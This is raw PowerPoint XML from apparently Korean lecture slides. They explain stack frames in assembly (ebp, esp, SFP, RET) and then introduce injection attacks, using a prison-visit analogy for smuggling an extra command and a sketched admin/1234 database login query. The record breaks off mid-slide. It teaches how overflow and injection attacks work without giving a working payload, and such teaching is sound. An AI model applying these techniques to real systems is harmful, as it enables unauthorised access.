                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>base pointer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>을 저장한다  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=  SFP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="120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이전 스택의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>에 저장한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>의 스택을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x60 = 96</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 늘린다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. = 4*20 + 16</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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합</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(heap) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>할당 함수 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>malloc </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>실행 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: C = malloc( … ) </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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Edi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>로 변수인자를 넘긴다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(int) = 4 </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="120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Edi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>에</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, “1” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>의</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>주소값을</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 불러온다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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b[20]</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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RET</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rbp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> - 96</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rbp</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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SFP</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rbp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> - 16 </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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/Theory/T19 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>어셈블리어 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>범용 레지스터</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err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>인젝션</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>(injection)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rgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>홍길동</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>씨 면회 부탁</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>.</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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rgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>홍길동</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>씨 면회 요청</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>. </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="120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rgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>홍길동</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>씨 석방 최종결정</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>.</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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rgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>홍길동</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>씨 석방 요청</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>. </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="120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err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>인젝션</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>(injection)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rgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>홍길동씨 석방 요청 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>오버</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>씨</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> 면회 부탁</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>.</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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rgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>홍길동씨 석방 요청 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>오버</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>씨</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> 면회 요청</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>. </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="120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err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>인젝션</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>(injection)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ID</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>:</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>admin</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>PASSWORD :</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> 1234</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="120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1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>어 있어 여기 계정정보</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>or</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>그런애</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="120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사용자</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(client)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US">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rgbClr val="7030A0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>DATABASE</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>야</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>계정정보</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>에</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>,  ID </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>가</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>admin </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>이고 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>PWD </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>가 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>1234 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>인 계정 있니</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>?</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>로그인 성공</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>!</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="120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err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>인젝션</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>(injection)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err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>WebRequest</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> @{ ID</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>:</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>admin</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>PASSWORD :</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> 1234 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>}</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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ID</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> 가 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>admin, PWD</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>1234 ??</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>그런애</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="120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사용자</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(client)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US">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SELECT </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200" err="1">
                  <a:solidFill>
                    <a:srgbClr val="009400"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>user_name</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:srgbClr val="009400"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
